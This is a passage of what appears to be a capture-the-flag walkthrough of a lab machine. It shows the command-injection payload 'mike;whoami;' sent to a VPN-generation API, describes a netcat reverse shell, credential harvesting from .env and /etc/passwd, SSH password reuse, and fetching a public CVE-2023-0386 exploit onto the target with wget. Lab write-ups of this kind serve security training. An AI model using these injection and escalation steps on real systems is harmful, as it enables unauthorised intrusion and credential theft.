url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAABnElEQVR42pWTWY+DMAyE+f//bh9belCtylUIICDhSmc93qVi25fWkhUO58vYA0HXtvDea97v98fKmBaP1o4YnEWWxJimCcuyYJ5nrVnT+zu+wivy2w1BFqdykaOua3RdB2utbiB4mhe4ccY8Dki+r0jTDHVTo+969H2PcRy1lgfZ4fc6iKIc12uCLMtQliWappENHaicGxiEx0kjwFprjDEoikIFbDtiCLBCHFdSnCIVKFtirO0w+CxNV6BREBVyHYbhsecPaARoYOTEVtr2nA8LNqdygzHSaj9IW8s/Rc8RGGNhqh62a7E4h7m3mGSOXiCrWZxNkiSirtAZM53UUt0L0ImLTobuRqdK1iRkmwTexEWCtmN5AeKNIDCOY/0SaBRdfTbjI6BXU1JV2Ir7TBpC+Db1s/kEyLYJIpAuP4+G92+3XJUVyqJUGE1h21vQ+jO8p1AK2e7pdMJ+v8fhcMDlcsHxeNRnURQhDEOt+Qi42+0UwiSYEMKZfJfn+ftA/mrcSNj5fFZlXKmUKw/4SCGBhDBX8HrPpFoq/AH+xIsLVUKXHQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="add username parameter" title="" src="/static/7d395124d395793ba46158156c747db5/50637/admin-vpn-generate-add-username.png" srcset="/static/7d395124d395793ba46158156c747db5/dda05/admin-vpn-generate-add-username.png 158w, /static/7d395124d395793ba46158156c747db5/679a3/admin-vpn-generate-add-username.png 315w, /static/7d395124d395793ba46158156c747db5/50637/admin-vpn-generate-add-username.png 630w, /static/7d395124d395793ba46158156c747db5/fddb0/admin-vpn-generate-add-username.png 945w, /static/7d395124d395793ba46158156c747db5/2cd87/admin-vpn-generate-add-username.png 1017w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I tested for command injection within the <code class="language-text">username</code> parameter to the <code class="language-text">/api/v1/admin/vpn/generate</code> route:</p> <div class="gatsby-highlight" data-language="json"><pre class="language-json"><code class="language-json"><span class="token punctuation">{</span> <span class="token property">"username"</span><span class="token operator">:</span><span class="token string">"mike;whoami;"</span> <span class="token punctuation">}</span></code></pre></div> <p>The server responded with <code class="language-text">www-data</code>, showing successful command execution.</p> <p>Next, I started a Netcat listener and then sent the following command for a reverse shell:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 504px; " > <a class="gatsby-resp-image-link" href="/static/e6a664797959c71e1ceaf237d68e1d1d/0dcb2/send-shell-cmd.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 71.51898734177216%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAABxElEQVR42qVT2ZKbMBDU/39ZviBP2bA2NrdABwgQ2J0erXFlkypXDlV1jUaIVs+lznmO7HRGXCP+dd3v9+de1acMzTnDHAKmaUKMEeM4pkv7vn/C7XZL54Lbg6SzAV++XrEu/J8caqhr1PkFvW5Rc1+WZYIxBm3bQmsNay2GYUDgD4eaJzEfidv+9JWxE4rKoSg0iT5IBaLSe59I5nlOEF/ssixwzqVofl3KGIvTqcT5XCHLvpOsxOVySRClh0JRLFYeEIgvjya1nwlH5LklkSNxQ2KNvh+e4VZVlYhElRBt25byKb7gN4V976msJ6nB+/tAOyR1QiQ2ZxcIyZ8u5dxEVYYYki0Ki6aRXFa0DcqiQDhCeyT+JWHXGYY6pJCv14a2R9e18GwhxyKs8e/6U2lt8fbWMTzDIpCU1a5Z7ZlJD0Skuo3km+RPwD1eqFTWerbDygRvbIUdxu4Y3YzNWUQWI7I91oc99q/CVt47Jv3GFlhZxRX/u1RcV45Pj2/FCVl1gZ89HNH6FmEZYaYB3dhBE3LWjxomGOhJp/N25L01PEdTSXPOCyeBhzPnMcwfkzGFKZ2LLxA/NfVP349vx/TI5PwAks481sRKd7gAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="send bash shell command" title="" src="/static/e6a664797959c71e1ceaf237d68e1d1d/0dcb2/send-shell-cmd.png" srcset="/static/e6a664797959c71e1ceaf237d68e1d1d/dda05/send-shell-cmd.png 158w, /static/e6a664797959c71e1ceaf237d68e1d1d/679a3/send-shell-cmd.png 315w, /static/e6a664797959c71e1ceaf237d68e1d1d/0dcb2/send-shell-cmd.png 504w" sizes="(max-width: 504px) 100vw, 504px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">nc</code> caught a shell as <code class="language-text">www-data</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d1c8acf423a3b6b929dd619366fa5429/80335/shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 19.62025316455696%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA10lEQVR42k2P0XKCMBRE+RYbBsQqVUoSJBGCiKZFYNTp///J9ibojA9ndpOHvbsB21qwbEK4+8U6Myirq0fVA3Q9QlUDdqLDIhL4cMRy9jGxlISYSZxyBNLckakeXM8hfH/BNj8i2WikdCDNGqzSCvGn8kSrEsu1RpgUWMTchzl9+cC0EzXqUTUjDoQ53eg9kJ/Q2T/U7Y2OWBTqB6K00GaiwyNy2WHzbfwqp1+8BUskNVTWNyt0D1lekBdnHM8P+rtSoz2YmxbxpwqENNN5Rm1CCmBvuIb/4z+DOd+tKpsAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="shell" title="" src="/static/d1c8acf423a3b6b929dd619366fa5429/50637/shell.png" srcset="/static/d1c8acf423a3b6b929dd619366fa5429/dda05/shell.png 158w, /static/d1c8acf423a3b6b929dd619366fa5429/679a3/shell.png 315w, /static/d1c8acf423a3b6b929dd619366fa5429/50637/shell.png 630w, /static/d1c8acf423a3b6b929dd619366fa5429/80335/shell.png 652w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Enumeration of the system led to the discovery of a username and password in <code class="language-text">~/html/.env</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 491px; " > <a class="gatsby-resp-image-link" href="/static/28ebe006f472b59611bda269c9ea2986/5c810/env-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 73.41772151898735%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACjklEQVR42oWT23aaYBSEfZKmnuIpgiJnkDNoBIma1KRrte//GJPZv6TNRQ8XsxT0H749e+iFyRFh2iLKnuDHDdZWjpWZQ9ukcIJafV+sEjxQ/Yn9S8OZS3kYjNcYTAwM57yeO+jFxRlxfoYbPGK5TmDYJUy3Usby3ds22Lg7rO0KGs033h6mt8NIGbo01DGcbjBcuMq0pwgpMRFDy6sQZyca1fCjI4K4xZbXTlhDtwrE5QVefMRU22I09/Glv8TdUOsIaeiQLOCohl1g8hCoz4TEH4YGyYRSJKOHNPcJEBcXJOWzAjDtiGdJKyO7wUEdNjjibBkqw23S4na/IT2zjRrYzFM3C0UXiGH1DIfnRGuT+Q6XGNyv0Mv4FJGY6lzEximRFDfCkMb57sqFnTvaHaL8ogglBjGfEGIky5lYzJOGEX8QIpth35bymbCm+UVROj6XZuTK3FVkB0Vn+ntmm2Mwdbgc9/+EWfUCeaiMLSNLdp4si78ZXOTXe4tGTlcjGsofA8p0Kiz0iPX4RBjVqlIhRxNCzcgUofRzm56Q76/sa4bxwv9tGKVP6pCMvGAVZOS0IwxolLIm8h+f13I4VdM0KlPpp85uSjsGk27kbXrkgVYdsP2dqoEQeuEtP4lDEYePWDErqZlMs6EMq0R/bGFEI9Etw8dvyA+vCj+jAtLI9h6MFBqLPF/FmK0idjBirQJlMJRXT8Ts5I35MBT1zkmDU37CW33FKWtRM7eaGwy1ENqdBq2vw6Dm96ba5GhGTf+kzvC1PKHdv+DH809cj9/RsrBP1QUFRys4Zs4oDlYGfWSgT5rx9G+GN/X2zGzvV2jiA1rSlk6OitWp3BI7duztcOX9IwaDdTfevw3fAVgN99jUJPjaAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cat .env" title="" src="/static/28ebe006f472b59611bda269c9ea2986/5c810/env-password.png" srcset="/static/28ebe006f472b59611bda269c9ea2986/dda05/env-password.png 158w, /static/28ebe006f472b59611bda269c9ea2986/679a3/env-password.png 315w, /static/28ebe006f472b59611bda269c9ea2986/5c810/env-password.png 491w" sizes="(max-width: 491px) 100vw, 491px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I viewed <code class="language-text">/etc/passwd</code> to see what users were on the system:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a0e8916eb4ad513b4289ca950bb4322e/a7269/cat-etc-passwd.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 85.44303797468356%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAAC0klEQVR42nWU6Y7aQBCE/SbRchmwAQPG+D4x982S5P1fpFLdwIZVlB+t8SDNN1XVPRhBukVanZAUR4TpDkGy072fbDGeFXD9CtYoRMt00eyM0ezN0OzP/1tGmB8eMK7F8hNJeURWPSotDuiPEljjFOYgRsP00GiP0CBYy5z8c4GRlGdE+Z6wK8rlDVG21zWvP6n0AmdeY+IvYTkZPtoOml0q7XkKapjTxwUC7vsP4DzeQEqsRukecS7KztzveRGV1jck1RltHvgQy1bwVEOA9YAotDt9AqMNQsKS4qQZRtlBgXF+RpgdCbsg4G/jWYmWHvK/1HyrFzCl5YwKIh6umGFGQF5dUdBytmAM6zvzPWLs1TD77tPeO8z/ptYQULG4qNWSwJwQUVtvfuu3WualbrjBxFtg4ETo2p7m2eg8yxR13svyVi378RYJoWq5fCiO85PaDvnb1F8RuoYX7zCY5Nr5wTTndwprGOCj5WijDAFlVCT2Yh2hEy0/FKflhfuzrjFXZ7ZQ6/Y4h63QDNYkQ99J0B34qtSQg+vdb2Z2U5BkWNRXVKu7jk+5vCtwsflF6AmT+Ypu2DxpIgXIhIzYMIfVtjTDAw/fCGJeavWgQKnXBTkzjtIDnGkF04rQGyQc+FSHvjdKdLWptjsIJMO1DrOA5Dv4GqG9RhAzw4wK+8MYP1oMn6+l1ZUxkZIB5xxylZI9M9zo2KTlSUtAspcoIs6lrC/ljltiQCUClcMtwgTYepZ8G9JJyUtGQ95xzHcte2lSRqspo5BBl4wXnElZZ8GKXa8x4gU2u/0ONzIqKgkpabNiXtXirJVJlvytlMHnKtZdvmmbb3rIDktunX6ADp/iN4XnoMY5XOISrnCnxWu8xs98h8O8wkW+kw18t8DQrfj8KrR78qZnD1XMUesdKG85ZU7SCPlz8II1alqT7GwnVYi8464dssMBgfO/oDfYC/gHJ1Q5r9i1fbgAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cat /etc/passwd" title="" src="/static/a0e8916eb4ad513b4289ca950bb4322e/50637/cat-etc-passwd.png" srcset="/static/a0e8916eb4ad513b4289ca950bb4322e/dda05/cat-etc-passwd.png 158w, /static/a0e8916eb4ad513b4289ca950bb4322e/679a3/cat-etc-passwd.png 315w, /static/a0e8916eb4ad513b4289ca950bb4322e/50637/cat-etc-passwd.png 630w, /static/a0e8916eb4ad513b4289ca950bb4322e/a7269/cat-etc-passwd.png 740w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There was an <code class="language-text">admin</code> user, so I attempted to log in over SSH using the username <code class="language-text">admin</code> and password <code class="language-text">SuperDuperPass123</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/18a461b6ee67d4be208458b0ed5cabc9/0337b/admin-ssh-login.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 86.70886075949367%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACrklEQVR42n1U2XKbQBDkTxJdHAsIxLHcSAhJlizHVXGS8v9/Sadnsa04dvLQNSsQTc90D5Yq7xDtnqHHZxS7Bwznn9hffkF3F2TNGXExYqEKzD39Hkpj4RcGSwNtYBX9FXlzZ5DVd9iURyTVCWE2IEi3cKPWIMr3iPWIiAjSHda8v/LLD6SW/LHdPxpF8mAm5O0Z9fDNoNxeSbI390SZqF2SSCBnA/8GK6SKdnhAnA/w1jXSckRaHaCbo1Fd9PcGospZN1gF1Y3oT7wSenxzmGyx5gPBpoPDi0HcwgtKnnO4bMMJS6ikh9r0JK3flH4GK+fcDucfKLszlvzjl1WKoqVRaQ+PRB5Jv65imnAz5l9khnCjD9gdn0h4D5tzma0SxNkOS5dEdoa5SyJem9kkdVIsvJzQ/yMc0Q2P6GlATnez6mygm3sk5Qn+ZkulBVRU84VUaG/4AiFPPif0woaK9tjkI7LyjKRgdIojI3SGu24NiRNWZn52WGPmTgpnqxfFqvybkDkLGkj1wg4u4fBsB7WpjspZa7pbG5cVjTOR8TgKN/nQvpWKGrZmVGqGujiZVlO5xt8e1TmBNjkUlRKfpV9NyvxPWs4qZq25QNdcNa6htJ3xrNtphlHG7Ug6hHENta7gs85kjmx3ToPm3vu1NAoN6HaipZ6M0jUVv6qVKh14EVsmXGbUVhlzOs3Xi7u3FbWidM9QD0jyA2Kehfx1lirqacw0U49nFffGdanysGyWZFXF0zgE1joRspEKRhpQYaVkQxgRT2LSGAi5rRq2WWDm5BNcPVWbGXUy477AqjirurtiN35Hs+XHoL1iODyh7h+Qc6YCmW/MDqQbMSXhF0lFnXF6ITFSN6ctn2sWbC/wzVeGRnCWotBlTBaONpi/1KXLr4yaYMgM9FRfCH8Djd4b6pJwUU0AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="admin ssh login" title="" src="/static/18a461b6ee67d4be208458b0ed5cabc9/50637/admin-ssh-login.png" srcset="/static/18a461b6ee67d4be208458b0ed5cabc9/dda05/admin-ssh-login.png 158w, /static/18a461b6ee67d4be208458b0ed5cabc9/679a3/admin-ssh-login.png 315w, /static/18a461b6ee67d4be208458b0ed5cabc9/50637/admin-ssh-login.png 630w, /static/18a461b6ee67d4be208458b0ed5cabc9/0337b/admin-ssh-login.png 761w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Upon logging in, there was a message saying that the user had mail:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0a78c7f3939313c4900b594f9bd876d8/2059a/you-have-mail.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.746835443037973%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABFElEQVR42mWQ6W6DMBCEeZQkBBpOg2ubMxwJSegh9f2fZjp2Dqnqj0/DgHZ2B093K0z/gWr4hO5uUO0Nmt5hPb/rfoVsLkjVhFzP8OMKu9g4fId+4RX1BRbRXN2QYkimZg6eUFRnCHNCTm81KUek7xMZEcvBLUjViNzMfDdwboBnRAtT9KjLI4ToEJWDu8BPauyTymH9nj5IG4RZ454tIX1AH+btXYm3cPO5u+LWLjBlj4RbZb24asKc3aWCl9rLDqJnaI03G8CwXWT+1fdkf4UaVtTzt/uPFSu3VNUsyOQR2aNiIllX3tXWt+HPwBds44XdD7LpCxmDI1YPIo1tUGJHNnuBjZ9iG0o3/GR70NTqb9iDX5pKv5nczDSSAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="You have mail." title="" src="/static/0a78c7f3939313c4900b594f9bd876d8/50637/you-have-mail.png" srcset="/static/0a78c7f3939313c4900b594f9bd876d8/dda05/you-have-mail.png 158w, /static/0a78c7f3939313c4900b594f9bd876d8/679a3/you-have-mail.png 315w, /static/0a78c7f3939313c4900b594f9bd876d8/50637/you-have-mail.png 630w, /static/0a78c7f3939313c4900b594f9bd876d8/2059a/you-have-mail.png 767w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So I went to <code class="language-text">/var/mail</code> and found the following email:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8b6c32cf87f87ebe8b9ed6e799f9344c/030ec/var-mail-cat-admin.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 42.405063291139236%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABaElEQVR42l2S63KCMBCFeZSCKCIiAoa7BK9Yi9TR9k9n+v6PcXoC1mp/fLPZDTl7NkQT9QWzbQs738MWDazoE25Uww0kbK+EPpxjYAsMJimJn7EXJHqqaWL5Bll/QO6vOLTfWB2+IHdXpGXDjxMY1gLGXfRRMLnx3EQrZItCnpCXJ5SrM6rNBXJ7QVad4Md7mHT2K2qM/B61tvze4X/BhA7j/BVhvMNy1SKjsHI3C9fwxLYTVE4HY0XUYYwFhYPeuRVS6G9sbRZU8MUG42mOIQ8qTHXYivEyFL2Q3WMqbqOaDhuN6dwK7tdhOgm0kGMVHE+5zKUa+x1pcWR+ZN7SLfeYZ1yrvFifkZRHpLJBvlJ7NWucqmoQpDtoc7oTWY0g3sL1K0znklHC4R9W7lX+iDMvOybEDbnP1+AEzP1l73Ca1/DYwWUn09tAdw8QeYMRx9OHvHQr6jBGoscivEedNb2LgpG12/P5AV9zAHwg82eKAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cat admin" title="" src="/static/8b6c32cf87f87ebe8b9ed6e799f9344c/50637/var-mail-cat-admin.png" srcset="/static/8b6c32cf87f87ebe8b9ed6e799f9344c/dda05/var-mail-cat-admin.png 158w, /static/8b6c32cf87f87ebe8b9ed6e799f9344c/679a3/var-mail-cat-admin.png 315w, /static/8b6c32cf87f87ebe8b9ed6e799f9344c/50637/var-mail-cat-admin.png 630w, /static/8b6c32cf87f87ebe8b9ed6e799f9344c/030ec/var-mail-cat-admin.png 764w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The message mentions that there have already been a few serious Linux kernel CVEs this year, noting the one in OverlayFS/FUSE specifically. A web search led to <a href="https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/" target="_blank">this</a> article from Datadog, which provides more details on the OverlayFS vulnerability (CVE-2023-0386).</p> <p>The article states:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8afc8a69ba926c6955750fcb8c81c465/af094/datadog-article.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.911392405063296%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABLElEQVR42oVR2W6DMBDM/39dcwekJg0kNmDAB0ShCTAd222Vl6qWRntqdne8SNMUh8Me2+0WaZLg+H7Ear1CkqQ4nY7YrDfY73ZYvi0xDAP+e4u6qlCVJbIsgxQCUkpk5zNK5nxNShHy4npF13XonIfD7XYLcM7CMr7f75GwUiSsa6i6RaUUmrYNqJuGqNG2Goq20bGuahUt64KDKg4tigLG2EiouY2+XDCw4aE1nsQnCX/w1AYP2lf4nslajOOIcZowfSMQ9iS0khN4kiUcp+pLDiOibz18TVyD7/OG9kEp5mkMRPM8vWgoJIo8R0ENS25a0q9IUGR5iIs85sX5A4pkkn0NdXbc1J9pjAna/hJ2fQ/buSCs93sK7a2xUWzHT3BdROhlzp85//HLXzmEEwrVAOOeAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="datadog article" title="" src="/static/8afc8a69ba926c6955750fcb8c81c465/50637/datadog-article.png" srcset="/static/8afc8a69ba926c6955750fcb8c81c465/dda05/datadog-article.png 158w, /static/8afc8a69ba926c6955750fcb8c81c465/679a3/datadog-article.png 315w, /static/8afc8a69ba926c6955750fcb8c81c465/50637/datadog-article.png 630w, /static/8afc8a69ba926c6955750fcb8c81c465/af094/datadog-article.png 788w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Checking the current OS info on the machine with <code class="language-text">uname -a</code> showed that the current Linux kernel was <code class="language-text">5.15.70</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4472c26a130e3b0fa522525ac5ef9ed6/08eea/uname-a.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 8.860759493670885%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfklEQVR42k3MSwqDMBRGYRfTqmDUJppU46sBaUCofbn/rZxGRx183PNPbmSWDePfqP5BaTeq4cvgVtp+oVAOqWcqcz/6ElrIibxyZHJEqFsQthrJa0ehHZH2H/S8oqcnZRMedy+u1nNKG5LMkorusHciLLFoj3vOWuKd+JNbfg8rQZ/R/5X1AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="uname -a" title="" src="/static/4472c26a130e3b0fa522525ac5ef9ed6/50637/uname-a.png" srcset="/static/4472c26a130e3b0fa522525ac5ef9ed6/dda05/uname-a.png 158w, /static/4472c26a130e3b0fa522525ac5ef9ed6/679a3/uname-a.png 315w, /static/4472c26a130e3b0fa522525ac5ef9ed6/50637/uname-a.png 630w, /static/4472c26a130e3b0fa522525ac5ef9ed6/08eea/uname-a.png 765w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The Datadog article contains a proof of concept exploit <a href="https://github.com/xkaneiki/CVE-2023-0386/" target="_blank">here</a>.</p> <p>So, I cloned the repo and used <code class="language-text">tar</code> to compress it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/df8f58d137f556c8795ae9693fc0c7cc/871fd/clone-exploit.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 51.89873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABuklEQVR42m2SaXLiMBSEfZSJFzDLxHiXjbwHAjYYQjJTNfc/SE9LLMksP7q0lPSpXz8Z82SLpbwgKN/hr3vUrxfsjr/Q7T9Qbd5QbS8oN2eIesAq6eCLDZZhBXOWwpr/KyOvj1jXB2qAbA4ouhNBZ8TrVzzHDVZpC2eZwZ4LQpLHxa/zP4CyGSHKnqAzyperFDSrBtR0Jzkv6TQt9pitCrie5Cgx+Z7/H1i/sKxuRLM9E9JDtiOhJzrcIS0HBCwxzK9uY7nXj6dyBy9i2dMQlnKq3SoJGIuowUKMWGRvmAWdLr9W2RGqHOZcC7rz4paAWF823RvE5ZpQUyvQMpzoCDsaYfk9rMVaH7IZuMPX1KjnM3EDEeB+gu4yp9EVOlkR6FWwggOs8ARn1Wo3ZXtCwdJVvkpqrZo0ZXM07A6+uTQnCubDdHwYYTFAdB9Yb96ZUY+E2SXMLM62iCjB3AoCZXOEz2+jQMr1w6WCTe/OmWHJg5v9D+yHn2iZneQ3eg4quMucr8Z4ciJ8o55uF23liiVaGpJqiDX7lJEVPbt8RsNulywvZ2e9sMF0kcN200eeKkclvacltP4G/gbEg0TwU2HG6gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="clone exploit" title="" src="/static/df8f58d137f556c8795ae9693fc0c7cc/50637/clone-exploit.png" srcset="/static/df8f58d137f556c8795ae9693fc0c7cc/dda05/clone-exploit.png 158w, /static/df8f58d137f556c8795ae9693fc0c7cc/679a3/clone-exploit.png 315w, /static/df8f58d137f556c8795ae9693fc0c7cc/50637/clone-exploit.png 630w, /static/df8f58d137f556c8795ae9693fc0c7cc/871fd/clone-exploit.png 696w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Started up a python web server:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 523px; " > <a class="gatsby-resp-image-link" href="/static/8fafa783537d7d0c0aa0e4ac2266c658/7cd60/python-server.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.759493670886075%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAiUlEQVR42h3OWw6CMABEUZaisaCYqAnFUqBaRB4BJEGIcf8ruVY+Tma+JuMFJ4MfDYh4QUQT/qVE6pqq/VDWC2X15mZHlzPZfcAUI7l9IY6ajZBs/ZjdXiEOycqT2YCyM+qxEJuROG14Ngu2nGj6L0o3pKZHpS1X1/+06TjLApV3JE7oTgWhXgd/MltDbUDK5GEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="python http server" title="" src="/static/8fafa783537d7d0c0aa0e4ac2266c658/7cd60/python-server.png" srcset="/static/8fafa783537d7d0c0aa0e4ac2266c658/dda05/python-server.png 158w, /static/8fafa783537d7d0c0aa0e4ac2266c658/679a3/python-server.png 315w, /static/8fafa783537d7d0c0aa0e4ac2266c658/7cd60/python-server.png 523w" sizes="(max-width: 523px) 100vw, 523px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>From the target machine, I used <code class="language-text">wget</code> to download the archive and used <code class="language-text">tar</code> to extract it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f4e62f8128f9fd1522159f8d722d7ae1/f2f9b/wget-exploit.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.050632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA9UlEQVR42m2QW26DMBBF2UrbqCEQwJT6QTDYGEhKSBtFqrr/ndyOTV8f/Tiyx/KcuZqIjQv22iHlBrJ9QakmcO3PEY17C/faLlBmgWjnUO9Yi7jQeEgkIbD5Q+TOHzDHG2qSaWrshivc/E6yV3TTDYbgzSkI0qcOSdkF4TZvguybH+HBXiD0DKVPOJgzuvGKpr9AdZS8sijEgE2qcBfzX3YC957/hEwOKPiAvOqxp8kJUdVHZCTLnnvCIuc94ZALF958nZTtV23xmNXk6LHNFKJSTmszCbPKgNGngoiLBkyOYZeeVU4yglFqH8TvO+d2TZjKkPATLSqjio/ygccAAAAASUVORK5CYII='); background-size: cover; display: block;" 